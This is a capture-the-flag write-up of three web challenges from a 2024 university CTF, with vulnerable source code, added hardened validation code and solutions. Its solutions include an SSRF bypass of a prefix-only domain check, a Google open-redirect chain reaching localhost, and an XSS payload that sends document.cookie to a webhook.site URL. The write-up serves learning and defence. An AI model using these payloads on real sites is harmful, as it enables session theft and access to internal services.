
Description

My team, HCS (Heroes Cyber Security), the cybersecurity community team of the Institut Teknologi Sepuluh Nopember (ITS), participated in the MetaRed Argentina-TIC CTF 2024, which was hosted by CERTUNLP (CSIRT académico de la Universidad Nacional de La Plata).

We managed to secure 3rd place out of 205 teams. Thank you to my mentor @daffainfo, who worked with me to solve the web challenges.

Siem logger

Exploit local first! You have the source code
https://siem.ctf.cert.unlp.edu.ar
Source: siem.zip

TL;DR

Bypass the internal-host check with a redirection.

Solve

We got a website like this.

image

Since we have the source code, we can analyze it.

```python
# Imports and the Flask app object are added here so the snippet is complete;
# they were not part of the extracted excerpt.
import os
import re

import requests
from flask import Flask, jsonify, render_template, request

app = Flask(__name__)

ALLOWED_DOMAIN = "intranet.ctf.cert.unlp.edu.ar"
domain_regex = re.compile(rf"^{re.escape(ALLOWED_DOMAIN)}")
flag = os.environ.get('FLAG', 'flag{fakeflag}')


@app.route('/')
def index():
    return render_template('index.html')


@app.route('/send_flag', methods=['POST'])
def send_flag():
    target_domain = request.form.get('domain', '')
    # Only anchored at the start of the string: anything may follow the allowed name
    if not domain_regex.match(target_domain):
        return jsonify({"error": "Invalid domain"}), 400
    try:
        siem_response = send_to_siem(target_domain)
        return jsonify({"success": "Flag sent successfully", "domain": target_domain, "siem_response": siem_response})
    except Exception as e:
        return jsonify({"error": f"Error sending flag: {e}"}), 500


def send_to_siem(domain):
    global flag
    data = {
        "domain": domain
    }
    # ↓ we are good people
    # The user-controlled string is pasted straight into the URL, flag in a header
    response = requests.post(f"https://{domain}/siem", verify=False, allow_redirects=False, json=data, headers={"Flag": flag})
    return "Log received"
```

Look at the domain regex: it only anchors the allowed domain at the start of the string, so it can be bypassed with something like intranet.ctf.cert.unlp.edu.ar.yourwebsite.com.
Because I don't have any host, we used an alternative approach using @, according to this reference.
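To make the weakness concrete, here is an added example (not code from the challenge) that puts the challenge's prefix-only regex next to a hardened check. The hardened variant is our own: it requires the submitted string to be a bare hostname and compares the host that the URL parser actually extracts against the allow-list, so both bypass shapes above are rejected. `attacker.example` is a placeholder host.

```python
import re
from urllib.parse import urlsplit

ALLOWED_DOMAIN = "intranet.ctf.cert.unlp.edu.ar"

# The challenge's check: only anchored at the start, so any suffix is accepted.
weak_regex = re.compile(rf"^{re.escape(ALLOWED_DOMAIN)}")


def weak_check(domain):
    return weak_regex.match(domain) is not None


def effective_host(domain):
    """Where send_to_siem() would really connect: build the same URL it
    builds and let the URL parser report the host. Userinfo ('user@host')
    moves the real host to the right of the '@'."""
    return urlsplit(f"https://{domain}/siem").hostname


def strict_check(domain):
    """Hardened variant (added here, not the challenge's code): the string
    must be a bare hostname, and the host the URL parser extracts must be
    exactly the allow-listed name."""
    if not re.fullmatch(r"[A-Za-z0-9.-]{1,253}", domain):
        return False                      # rejects '@', ':', '/', '#', spaces
    host = effective_host(domain)
    return host is not None and host.lower() == ALLOWED_DOMAIN


# Constructed inputs: the legitimate host, the two bypass shapes from the
# write-up (with a placeholder attacker host), and an unrelated host.
SAMPLES = [
    ALLOWED_DOMAIN,
    ALLOWED_DOMAIN + ".attacker.example",
    ALLOWED_DOMAIN + "@attacker.example",
    "attacker.example",
]

if __name__ == "__main__":
    for d in SAMPLES:
        print(f"{d:50} weak={weak_check(d)!s:5} strict={strict_check(d)!s:5} "
              f"connects_to={effective_host(d)}")
```

The `effective_host` column is the useful one when reviewing code like this: the check and the request must agree on what "the host" is, and the cheapest way to guarantee that is to validate the parsed hostname rather than the raw string.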

Make a request, then intercept it with Burp Suite.

image

Then we got the flag in the response header.

image

flag{SsRF-Byp4SS-1s-FunnY!}

Open Googler

Went through Google. First, try to exploit it locally! You have the source code attached.
https://googler.ctf.cert.unlp.edu.ar
Source: googler.zip

TL;DR

SSRF + Open Redirect on Google.

Solve

First of all, we need to check the source code.

```python
# The excerpt is the body of the request handler; `url` is the user-supplied
# URL to fetch. The imports and the enclosing def are added for readability
# and were not part of the extracted source.
from urllib.parse import urlparse

import requests
from flask import render_template


def fetch(url):
    try:
        session = requests.Session()
        session.max_redirects = 4
        response = session.get(url, timeout=4, allow_redirects=True)

        # Don't start in Google (substring check on the hostname)
        if "google.com" in urlparse(url).hostname:
            return render_template('result.html', error='Error 1: You cannot start in Google', url=url)

        # Don't end in Google (substring check on the final hostname)
        if "google.com" in urlparse(response.url).hostname:
            return render_template('result.html', error='Error 2: You cannot finish at Google', url=url)

        # Check if we went through Google: exact hostname match on any
        # intermediate hop after the first response
        through_google = False
        for i in response.history[1:]:
            if "google.com" == urlparse(i.url).hostname:
                through_google = True
                break
        if not through_google:
            return render_template('result.html', error='Error 3: You did not go through Google', url=url)

        return render_template('result.html', status_code=response.status_code, content=response.text, url=url)
    except requests.exceptions.RequestException as e:
        return render_template('result.html', error=str(e), url=url)
```

We can do SSRF, but there are requirements:

  1. Do not start at a google domain
  2. Do not end at a google domain
  3. Go through a google domain on the way

It's easy when you already have a host domain, but for me it was a little bit hard :joy:.

But I already had a solution for that, like this:

http://googleads.g.doubleclick.net/pcs/click?adurl=https://google.com/url?q=http://localhost:8081/flag%26source=gmail%26ust=1731292172621000%26usg=AOvVaw2AXJAYB67T6oOikKsXYXkO

How do you do that?
Well, I found a similar challenge, SURFING, which gave me the googleads domain for the first part.

After that we use https://google.com/url?q= since we can choose the protocol after the q parameter; when I used google.com/amp/s/ it redirected straight to https, which fails because the flag was served over plain http.

The problem is that if we use that endpoint, we need valid usg and ust values from Google; for that we can reuse the ones from a Gmail link, like this reference.
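The chain above works because the server only inspects the start, the end and "did a google.com hop appear", and lets `requests` follow every redirect before any of that is checked. The following added example (our own code, not the challenge's or the project's) shows the defensive shape: follow redirects by hand, validate each hop before it is requested, reject userinfo and non-http(s) schemes, and refuse loopback, private and unresolvable hosts. The fetcher and resolver are injected so the logic runs offline; `ads.example`, `redirector.example`, the fake DNS answers and the fake servers are all constructed fixtures.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

MAX_REDIRECTS = 4  # same cap the challenge sets with session.max_redirects


def resolve(host):
    """Real resolver: every address the name maps to. Empty list on failure."""
    try:
        return [info[4][0] for info in socket.getaddrinfo(host, None)]
    except socket.gaierror:
        return []


def is_internal_host(host, resolver=resolve):
    """True for loopback/private/link-local/reserved targets, for names that
    resolve to one, and for anything that cannot be resolved (fail closed)."""
    if not host:
        return True
    host = host.lower().rstrip(".")
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        return not ipaddress.ip_address(host).is_global   # IP literal
    except ValueError:
        pass                                              # a DNS name
    addrs = resolver(host)
    if not addrs:
        return True
    for addr in addrs:
        try:
            if not ipaddress.ip_address(addr.split("%")[0]).is_global:
                return True
        except ValueError:
            return True
    return False


def check_hop(url, resolver=resolve):
    """Return None if the hop may be requested, otherwise a reason string."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return f"scheme {parts.scheme!r} is not allowed"
    if parts.username is not None or parts.password is not None:
        return "userinfo (user@host) is not allowed"
    if is_internal_host(parts.hostname, resolver):
        return f"host {parts.hostname!r} is internal or unresolvable"
    return None


def follow_safely(url, fetch, resolver=resolve, max_redirects=MAX_REDIRECTS):
    """Follow redirects by hand, validating every hop *before* requesting it.
    fetch(url) -> (status, headers, body) is injected so the logic can be
    exercised offline; in production it would issue one request with
    allow_redirects=False per hop."""
    chain = []
    for _ in range(max_redirects + 1):
        problem = check_hop(url, resolver)
        if problem:
            return {"ok": False, "chain": chain, "error": f"{url}: {problem}"}
        chain.append(url)
        status, headers, body = fetch(url)
        location = headers.get("Location")
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)     # handles relative Location too
            continue
        return {"ok": True, "chain": chain, "status": status, "body": body}
    return {"ok": False, "chain": chain, "error": "too many redirects"}


# --- Constructed offline fixtures (placeholder hosts, not real services) ----
FAKE_DNS = {"ads.example": ["8.8.8.8"], "redirector.example": ["1.1.1.1"]}

ATTACK_CHAIN_START = ("http://ads.example/click?adurl=https://redirector.example"
                      "/url?q=http://localhost:8081/flag")

FAKE_SERVERS = {
    # A chain shaped like the write-up's: click-through -> redirector -> loopback
    ATTACK_CHAIN_START:
        (302, {"Location": "https://redirector.example/url?q=http://localhost:8081/flag"}, ""),
    "https://redirector.example/url?q=http://localhost:8081/flag":
        (302, {"Location": "http://localhost:8081/flag"}, ""),
    "http://localhost:8081/flag": (200, {}, "flag{constructed-sample}"),
    # A benign chain that stays on a public host
    "http://ads.example/start": (302, {"Location": "/landing"}, ""),
    "http://ads.example/landing": (200, {}, "public landing page"),
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def fake_fetch(url):
    return FAKE_SERVERS.get(url, (404, {}, "not found"))


if __name__ == "__main__":
    print(follow_safely(ATTACK_CHAIN_START, fake_fetch, fake_resolve))
    print(follow_safely("http://ads.example/start", fake_fetch, fake_resolve))
```

The write-up's chain is stopped at the third hop, before the loopback request is ever made, while the benign chain completes. Two design points matter: the resolver answer is checked per hop (a name that resolves to a private address is treated like a private literal), and an unresolvable name fails closed rather than being passed to the HTTP client to decide.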

The whole payload is ready, so we just validate it.

image

flag{G00gl3_H4ck3r!!SsRf_4nd-0p3n_r3d1r3ct}

TokyoBento

You know, just hack the admin cookie. Exploit it locally first! Try it in Google Chrome; Firefox is not vulnerable.
https://tokyo.ctf.cert.unlp.edu.ar
Source: tokyo.zip

TL;DR

SSRF + window.open redirection

Solve

We got a website like this.

image

Then we analyze the website's source code.

```html
<script>
    var urlParams = new URLSearchParams(window.location.search);
    var query = urlParams.get('query').replace(/[^a-z]/g, '');
    var param = urlParams.get('param') || "query";
    param = param.replace(/[^a-z]/g, '')
    document.querySelector('.searched').innerHTML = `${eval(param)}`;
</script>
```

Since there is a bot feature, I suspected this was vulnerable to XSS.
But with those replace calls, XSS was not possible through the parameters themselves (at least for me).
But writing the result of eval into innerHTML made me curious.

Then I checked whether the bot could be made to request another host (SSRF), testing with my webhook.

image

Well, we got the pingback, which means we can host a page that reads the cookie to obtain the flag.
Since I don't have any host, I just edited the landing page of my webhook with this script.

```html
<script>
window.open("http://127.0.0.1:5000/?param=name&query=a", "<img src=x onerror=\"fetch('https://webhook.site/62d6da14-30db-435c-b673-fcbd599097a8/?x='+document.cookie)\">")
</script>
```

The second argument to window.open becomes window.name in the opened page, so with param=name the page's eval(param) returns our payload string and innerHTML renders it. Submit the webhook URL to the bot, and we get the flag.

image

flag{GooGlECHr0me,Y0uAr3FuN}